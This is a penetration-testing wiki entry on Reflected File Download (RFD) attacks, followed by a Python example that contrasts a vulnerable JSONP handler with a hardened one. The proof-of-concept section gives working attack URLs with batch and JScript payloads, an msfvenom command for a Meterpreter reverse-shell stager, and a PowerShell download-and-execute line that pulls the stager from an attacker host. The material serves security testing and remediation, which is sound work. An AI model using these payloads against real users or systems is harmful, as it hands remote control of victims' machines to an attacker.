Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Reflected File Download (RFD)

POC

In a Reflected File Download the browser is tricked into saving an API response as an executable file. The `;/setup.bat` path-parameter segments are ignored by the API router (the request still hits `/api/some-path`) but the browser uses the last segment as the download filename, and an unvalidated JSONP `callback` value is reflected at the very start of the file body, so whatever follows is executed when the victim runs the file. Here are some URLs you can try to exploit this vulnerability (the browser percent-encodes the quotes and spaces for you):

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd"||calc||

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');var command = "Calc.exe";var WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run(command);

Note that the first payload is a batch payload: cmd.exe fails on `rfd"`, and `||` then runs `calc`. The `WSH.Echo` / `WScript.Shell` payloads are JScript and only execute if the downloaded file is handed to Windows Script Host, so match the filename extension in the path to the interpreter your payload targets.

Create a Meterpreter stager in PowerShell format, serve it over HTTP on port 8080 of attackerip, and start a matching `exploit/multi/handler` listener on LPORT 4444: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f psh -o meterpreter-payload.txt

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');var command = "powershell -ep bypass -NoExit -w hidden IEX (New-Object System.Net.Webclient).DownloadString('http://attackerip:8080/meterpreter-payload.txt')";var WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run(command);

When the victim runs the downloaded file, the stager is fetched and executed and you get a Meterpreter session on the victim's machine. RFD executes on the client that downloaded the file, not on the web server.
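The server-side root cause is a JSONP handler that reflects the callback name untouched and lets the URL path choose the download filename. The following is an added example, not Cobalt's code or the vulnerable site's code: it builds the response a naive handler returns for this page's first payload, the same response with the three RFD controls applied (callback allow-list, pinned Content-Disposition filename, nosniff), and a tester-side check that lists which RFD preconditions a response still meets. The handler names, the sample data and the identifier pattern are assumptions made for illustration.

```python
"""JSONP response builder: RFD-vulnerable vs hardened, plus a tester-side check.

Added example for this wiki entry (not Cobalt's or the target site's code).
Function names, SAMPLE_DATA and CALLBACK_RE are assumptions for illustration.
"""
import json
import re

# Constructed sample inputs: the first payload on this page and a normal callback.
RFD_CALLBACK = 'rfd"||calc||'
SAFE_CALLBACK = "handleResult"
SAMPLE_DATA = {"ok": True, "user": "alice"}

# A JSONP callback should be a plain (optionally dotted) JS identifier, nothing else.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
# Characters that turn a downloaded file body into something cmd.exe or WSH will run.
SHELL_METACHARS = ("||", "&&", "|", "&", ";", '"', "'", "(", ")")

# Headers every response of the hardened handler carries, error path included.
_RFD_HEADERS = {
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": 'attachment; filename="api-response.json"',
}


def build_vulnerable_response(callback, data):
    """Naive handler: the callback is echoed verbatim and no Content-Disposition
    is set, so the filename comes from the attacker-controlled URL path."""
    body = f"{callback}({json.dumps(data)});"
    headers = {"Content-Type": "application/json"}
    return 200, headers, body


def build_hardened_response(callback, data):
    """Same endpoint with the RFD controls: reject any callback that is not an
    identifier, pin the download filename, and forbid content-type sniffing."""
    headers = dict(_RFD_HEADERS)
    if callback is not None and not CALLBACK_RE.match(callback):
        headers["Content-Type"] = "application/json; charset=utf-8"
        return 400, headers, json.dumps({"error": "invalid callback"})
    if callback is None:
        headers["Content-Type"] = "application/json; charset=utf-8"
        return 200, headers, json.dumps(data)
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    return 200, headers, f"{callback}({json.dumps(data)});"


def rfd_indicators(status, headers, body, reflected):
    """Tester-side triage: list the RFD preconditions a response still satisfies.
    An empty list means the response is not exploitable as a reflected file download."""
    findings = []
    if status == 200 and reflected in body and any(m in reflected for m in SHELL_METACHARS):
        findings.append("callback reflected with shell metacharacters")
    if "filename=" not in headers.get("Content-Disposition", ""):
        findings.append("no Content-Disposition filename (URL path names the download)")
    if headers.get("X-Content-Type-Options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    return findings


if __name__ == "__main__":
    for name, builder in (("vulnerable", build_vulnerable_response),
                          ("hardened", build_hardened_response)):
        status, headers, body = builder(RFD_CALLBACK, SAMPLE_DATA)
        print(f"{name}: HTTP {status}")
        print("  body:     ", body)
        print("  findings: ", rfd_indicators(status, headers, body, RFD_CALLBACK))
```

Run it to see that the vulnerable body is exactly the `setup.bat` the victim would download, `rfd"||calc||(...)`, while the hardened handler refuses the callback outright; even when it accepts a legitimate callback, the pinned filename and `nosniff` mean a path segment like `;/setup.bat` no longer decides what the browser saves.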

Impact

Very High (when a shell session is obtained on the victim's machine)

Likelihood

Very High (requires only that a victim follow the link and run the downloaded file)